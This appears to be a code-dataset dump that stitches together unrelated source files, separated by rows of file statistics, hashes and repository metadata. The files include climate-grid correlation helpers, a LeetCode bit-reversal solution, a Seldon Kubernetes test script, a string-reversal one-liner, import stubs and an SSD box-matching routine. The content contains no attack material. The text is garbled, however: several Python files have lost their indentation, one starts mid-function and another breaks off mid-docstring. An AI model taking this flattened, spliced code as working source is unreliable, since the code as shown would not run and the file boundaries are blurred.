rmse = np.sqrt(mean_squared_error(varx.ravel(),vary.ravel()))
print('Completed: Computed NON-weighted correlation!')
else:
ValueError('Wrong weighted arguement in function!')
print('*Completed: Finished calc_RMSE function!')
return rmse
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorrHeight(varx,vary,levs,lons,weight):
"""
Calculates spatial correlation from pearson correlation coefficient for
grids over vertical height (17 pressure coordinate levels)
Parameters
----------
varx : 2d array
vary : 2d array
levs : 1d array of levels
lons : 1d array of latitude
weight : string (yes or no)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorrHeight(varx,vary,lats,lons)
"""
print('\n>>> Using calc_spatialCorrHeight function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### Create 2d meshgrid for weights
lon2,lev2 = np.meshgrid(lons,levs)
### Create 2d array of weights based on latitude
gwq = np.array([0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.5,0.5,0.5,
0.5,0.5,0.5,0.7,0.7,0.7,1.])
gw,gw2 = np.meshgrid(lons,gwq)
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average (17 P Levels)!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance (17 P Levels)!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation (17 P Levels)!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
corrcoef= np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_SpatialCorrHeight function!')
return corrcoef
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorrHeightLev(varx,vary,levs,lons,weight,levelq):
"""
Calculates spatial correlation from pearson correlation coefficient for
grids over vertical height (17 pressure coordinate levels). Change the
weighting for different level correlations
Parameters
----------
varx : 2d array
vary : 2d array
levs : 1d array of levels
lons : 1d array of latitude
weight : string (yes or no)
levelq : string (all, tropo, strato)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorrHeight(varx,vary,lats,lons,levels)
"""
print('\n>>> Using calc_spatialCorrHeightLev function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### Create 2d meshgrid for weights
lon2,lev2 = np.meshgrid(lons,levs)
if levelq == 'all':
### Create 2d array of weights based on latitude
gwq = np.array([0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.5,0.5,0.5,
0.5,0.5,0.5,0.7,0.7,0.7,1.])
gw,gw2 = np.meshgrid(lons,gwq)
elif levelq == 'tropo':
gwq = np.array([1.0,1.0,1.0,1.0,0.5,0.5,0.5,0.2,0.2,0.,0.,0.,
0.,0.,0.,0.,0.])
gw,gw2 = np.meshgrid(lons,gwq)
elif levelq == 'strato':
gwq = np.array([0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.5,1.,1.,1.,1.
,1.,1.])
gw,gw2 = np.meshgrid(lons,gwq)
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average (17 P Levels)!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance (17 P Levels)!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation (17 P Levels)!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
corrcoef= np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_SpatialCorrHeightLev function!')
return corrcoef
| 36.514469 | 95 | 0.468739 | 2,463 | 22,712 | 4.295575 | 0.097848 | 0.042533 | 0.020416 | 0.022684 | 0.831947 | 0.81465 | 0.795747 | 0.750189 | 0.738185 | 0.719187 | 0 | 0.030765 | 0.330222 | 22,712 | 622 | 96 | 36.514469 | 0.664738 | 0.224287 | 0 | 0.686411 | 0 | 0 | 0.11901 | 0.006239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059233 | false | 0 | 0.034843 | 0 | 0.15331 | 0.12892 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0a3472688b742e51fb849821bffb5408a0c299f0
| 5,306 |
py
|
Python
|
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | 1 |
2021-07-05T01:53:30.000Z
|
2021-07-05T01:53:30.000Z
|
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | null | null | null |
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | 1 |
2018-01-08T07:14:08.000Z
|
2018-01-08T07:14:08.000Z
|
__source__ = 'https://leetcode.com/problems/reverse-bits/description/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/reverse-bits.py
# Time : O(n)
# Space: O(1)
# Bit Manipulation
#
# Description: Leetcode # 190. Reverse Bits
#
# Reverse bits of a given 32 bits unsigned integer.
#
# For example, given input 43261596 (represented in binary as 00000010100101000001111010011100),
# return 964176192 (represented in binary as 00111001011110000010100101000000).
#
# Follow up:
# If this function is called many times, how would you optimize it?
#
# Companies
# Apple Airbnb
# Related Topics
# Bit Manipulation
# Similar Questions
# Number of 1 Bits
#
import unittest
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
result = 0
for i in xrange(32):
result <<= 1
result |= n & 1
n >>= 1
return result
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
print Solution().reverseBits(1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
int ret = 0;
for (int i = 0; i < 32; i++) {
if ((n & 1) != 0) {
ret |= 1; //same as // res += n & 1
}
n >>>= 1; // padding 0 on the left side
if (i < 31) { // CATCH: for last digit, don't shift!
ret <<= 1;
}
}
return ret;
}
}
We first intitialize result to 0. We then iterate from 0 to 31 (an integer has 32 bits).
In each iteration: We first shift result to the left by 1 bit.
Then, if the last digit of input n is 1, we add 1 to result.
To find the last digit of n, we just do: (n & 1)
Example, if n=5 (101), n&1 = 101 & 001 = 001 = 1; however, if n = 2 (10), n&1 = 10 & 01 = 0).
Finally, we update n by shifting it to the right by 1 (n >>= 1)
At the end of the iteration, we return result.
Example, if input n = 13 (represented in binary as
0000_0000_0000_0000_0000_0000_0000_1101, the "_" is for readability),
calling reverseBits(13) should return:
1011_0000_0000_0000_0000_0000_0000_0000
Here is how our algorithm would work for input n = 13:
Initially, result = 0 = 0000_0000_0000_0000_0000_0000_0000_0000,
n = 13 = 0000_0000_0000_0000_0000_0000_0000_1101
Starting for loop:
i = 0:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0000.
n&1 = 0000_0000_0000_0000_0000_0000_0000_1101 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
0000_0000_0000_0000_0000_0000_0000_0000 +
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
We right shift n by 1 (n >>= 1) to get:
n = 0000_0000_0000_0000_0000_0000_0000_0110.
We then go to the next iteration.
i = 1:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0010;
n&1 = 0000_0000_0000_0000_0000_0000_0000_0110 &
0000_0000_0000_0000_0000_0000_0000_0001
= 0000_0000_0000_0000_0000_0000_0000_0000 = 0;
therefore we don't increment result.
We right shift n by 1 (n >>= 1) to get:
n = 0000_0000_0000_0000_0000_0000_0000_0011.
We then go to the next iteration.
i = 2:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0100.
n&1 = 0000_0000_0000_0000_0000_0000_0000_0011 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
0000_0000_0000_0000_0000_0000_0000_0100 +
0000_0000_0000_0000_0000_0000_0000_0001 =
result = 0000_0000_0000_0000_0000_0000_0000_0101
We right shift n by 1 to get:
n = 0000_0000_0000_0000_0000_0000_0000_0001.
We then go to the next iteration.
i = 3:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_1010.
n&1 = 0000_0000_0000_0000_0000_0000_0000_0001 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
= 0000_0000_0000_0000_0000_0000_0000_1011
We right shift n by 1 to get:
n = 0000_0000_0000_0000_0000_0000_0000_0000 = 0.
Now, from here to the end of the iteration, n is 0,
so (n&1) will always be 0 and n >>=1 will not change n.
The only change will be for result <<=1, i.e. shifting result to the left by 1 digit.
Since there we have i=4 to i = 31 iterations left, this will result
in padding 28 0's to the right of result. i.e at the end,
we get result = 1011_0000_0000_0000_0000_0000_0000_0000
This is exactly what we expected to get
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
if (n == 0) return 0;
int result = 0;
for (int i = 0; i < 32; i++) {
result <<= 1;
if ((n & 1) == 1) result++;
n >>= 1;
}
return result;
}
}
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
n = ((n & 0x55555555) << 1) | ((n & 0xAAAAAAAA) >>> 1);
n = ((n & 0x33333333) << 2) | ((n & 0xCCCCCCCC) >>> 2);
n = ((n & 0x0F0F0F0F) << 4) | ((n & 0xF0F0F0F0) >>> 4);
n = ((n & 0x00FF00FF) << 8) | ((n & 0xFF00FF00) >>> 8);
return (n >>> 16) | (n << 16);
}
}
'''
| 31.963855 | 96 | 0.67942 | 885 | 5,306 | 3.80452 | 0.216949 | 0.470448 | 0.595189 | 0.646273 | 0.485595 | 0.473715 | 0.463023 | 0.454707 | 0.36828 | 0.328185 | 0 | 0.314932 | 0.225028 | 5,306 | 165 | 97 | 32.157576 | 0.503891 | 0.109876 | 0 | 0.264 | 0 | 0.024 | 0.905472 | 0.267618 | 0 | 0 | 0.017032 | 0 | 0.008 | 0 | null | null | 0 | 0.008 | null | null | 0.008 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0a444a2a9b00c93ede978edd61b59c20a6608e93
| 5,351 |
py
|
Python
|
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import time
import subprocess
from subprocess import run,Popen
from seldon_utils import *
from k8s_utils import *
def wait_for_shutdown(deploymentName):
ret = run("kubectl get deploy/"+deploymentName, shell=True)
while ret.returncode == 0:
time.sleep(1)
ret = run("kubectl get deploy/"+deploymentName, shell=True)
def wait_for_rollout(deploymentName):
ret = run("kubectl rollout status deploy/"+deploymentName, shell=True)
while ret.returncode > 0:
time.sleep(1)
ret = run("kubectl rollout status deploy/"+deploymentName, shell=True)
def initial_rest_request():
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
if not r.status_code == 200:
time.sleep(1)
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
if not r.status_code == 200:
time.sleep(5)
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
return r
@pytest.mark.usefixtures("seldon_java_images")
@pytest.mark.usefixtures("single_namespace_seldon_ksonnet")
class TestSingleNamespace(object):
# Test singe model helm script with 4 API methods
def test_single_model(self):
run('cd my-model && ks delete default && ks component rm mymodel', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-serve-simple-v1alpha2 mymodel --image seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c mymodel', shell=True, check=True)
wait_for_rollout("mymodel-mymodel-025d03d")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("mymodel",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("mymodel",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default -c mymodel && ks component rm mymodel', shell=True)
# Test AB Test model helm script with 4 API methods
def test_abtest_model(self):
run('cd my-model && ks delete default && ks component rm mymodel', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-abtest-v1alpha2 myabtest --imageA seldonio/mock_classifier:1.0 --imageB seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c myabtest', shell=True)
wait_for_rollout("myabtest-myabtest-41de5b8")
wait_for_rollout("myabtest-myabtest-df66c5c")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("myabtest",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("myabtest",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default -c myabtest && ks component rm myabtest', shell=True)
# Test MAB Test model helm script with 4 API methods
def test_mab_model(self):
run('cd my-model && ks delete default && ks component rm mymab', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-mab-v1alpha2 mymab --imageA seldonio/mock_classifier:1.0 --imageB seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c mymab', shell=True)
wait_for_rollout("mymab-mymab-41de5b8")
wait_for_rollout("mymab-mymab-b8038b2")
wait_for_rollout("mymab-mymab-df66c5c")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("mymab",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("mymab",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default && ks component rm mymab', shell=True)
| 50.481132 | 245 | 0.657073 | 720 | 5,351 | 4.709722 | 0.152778 | 0.053082 | 0.031849 | 0.050428 | 0.830434 | 0.784429 | 0.775877 | 0.775877 | 0.761722 | 0.730758 | 0 | 0.020525 | 0.216969 | 5,351 | 105 | 246 | 50.961905 | 0.788783 | 0.027658 | 0 | 0.617021 | 0 | 0.031915 | 0.320446 | 0.071552 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.06383 | false | 0 | 0.06383 | 0 | 0.148936 | 0.12766 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
6a94a7cd3e89c26bee4c47c7741e5a37358da6ff
| 46 |
py
|
Python
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 49 |
2018-04-30T06:42:45.000Z
|
2021-07-22T16:39:02.000Z
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 1 |
2020-08-31T02:36:53.000Z
|
2020-08-31T10:14:00.000Z
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 36 |
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
def solution(string):
return string[::-1]
| 15.333333 | 23 | 0.652174 | 6 | 46 | 5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.173913 | 46 | 2 | 24 | 23 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
0a8d1e23712a4b58170f56ad1d0354b9b57142a5
| 45 |
py
|
Python
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 11 |
2021-02-04T11:35:37.000Z
|
2022-03-26T10:32:00.000Z
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 4 |
2021-03-22T09:36:54.000Z
|
2021-03-26T09:10:51.000Z
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 6 |
2021-02-24T09:03:35.000Z
|
2021-11-16T02:00:53.000Z
|
from AudioLib.AudioEffect import AudioEffect
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0aab7620f824873c7b572e13e03aa334f91e254d
| 143 |
py
|
Python
|
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
from axju.generic.basic import BasicWorker
from axju.generic.execution import ExecutionWorker
from axju.generic.template import TemplateWorker
| 35.75 | 50 | 0.874126 | 18 | 143 | 6.944444 | 0.555556 | 0.192 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083916 | 143 | 3 | 51 | 47.666667 | 0.954198 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0ad2792c4efbba79b47edb4a13bc47fda219fd40
| 48 |
py
|
Python
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 5 |
2021-03-20T09:22:55.000Z
|
2021-12-20T17:01:33.000Z
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1 |
2021-12-13T07:40:46.000Z
|
2021-12-20T16:59:08.000Z
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1 |
2021-11-25T05:42:20.000Z
|
2021-11-25T05:42:20.000Z
|
# -*- coding: utf-8 -*-
from .compSpot import *
| 16 | 23 | 0.583333 | 6 | 48 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.1875 | 48 | 2 | 24 | 24 | 0.692308 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0add3254851b32ab4bc7e1c39aca7cbe53d6398b
| 190 |
py
|
Python
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 8 |
2019-10-21T23:24:51.000Z
|
2021-09-14T03:04:59.000Z
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 2 |
2021-02-09T23:52:47.000Z
|
2021-02-10T04:08:35.000Z
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 1 |
2019-10-21T23:32:18.000Z
|
2019-10-21T23:32:18.000Z
|
# from votesim.benchmarks.benchrunner import (
# run_benchmark,
# get_benchmarks,
# post_benchmark,
# plot_benchmark,
# )
from votesim.benchmarks import runtools, simple
| 23.75 | 47 | 0.705263 | 19 | 190 | 6.842105 | 0.631579 | 0.169231 | 0.323077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 190 | 8 | 47 | 23.75 | 0.866667 | 0.678947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c1199fad1c1f92e7be3b25334e3b5e42a47fbe5
| 6,633 |
py
|
Python
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 2 |
2021-02-06T22:40:13.000Z
|
2021-03-26T09:15:34.000Z
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 8 |
2020-07-11T07:10:51.000Z
|
2022-03-12T00:39:03.000Z
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 2 |
2021-03-26T09:19:42.000Z
|
2021-07-27T02:38:09.000Z
|
import torch
from ....data.utils.boxes import centroids2corners, iou
def matching_strategy(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_conf = target[:, :4], target[:, 4:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
#object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 4:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
def matching_strategy_quads(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4 - 8
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty(
(batch_num, dboxes_num, 4 + 8 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
